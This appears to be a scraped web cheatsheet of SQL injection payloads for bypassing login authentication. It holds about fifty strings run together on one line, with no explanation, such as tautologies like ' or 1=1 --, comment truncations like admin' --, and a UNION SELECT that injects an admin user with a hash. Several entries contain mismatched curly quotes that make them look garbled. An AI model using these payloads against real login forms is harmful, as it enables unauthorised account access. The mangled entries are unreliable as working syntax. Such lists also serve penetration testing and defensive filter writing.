SQL Injection – Authentication Bypass Cheatsheet
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- - or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or ‘1'='1 admin' or ‘1'='1'-- admin' or ‘1'='1'# admin' or ‘1'='1'/* admin'or 1=1 or ‘'=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or (‘1'='1 admin') or (‘1'='1'-- admin') or (‘1'='1'# admin') or (‘1'='1'/* admin') or ‘1'='1 admin') or ‘1'='1'-- admin') or ‘1'='1'# admin') or ‘1'='1'/* 1234 ‘ AND 1=0 UNION ALL SELECT ‘admin', ‘81dc9bdb52d04dc20036dbd8313ed055 admin' -- admin' # admin'/* admin' or “1'='1 admin' or “1'='1'-- admin' or “1'='1'# admin' or “1'='1'/* admin'or 1=1 or “'=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or (“1'='1 admin') or (“1'='1'-- admin') or (“1'='1'# admin') or (“1'='1'/* admin') or “1'='1 admin') or “1'='1'-- admin') or “1'='1'# admin') or “1'='1'/* 1234 “ AND 1=0 UNION ALL SELECT “admin', “81dc9bdb52d04dc20036dbd8313ed055 |
Bypassing Authentication with SQLi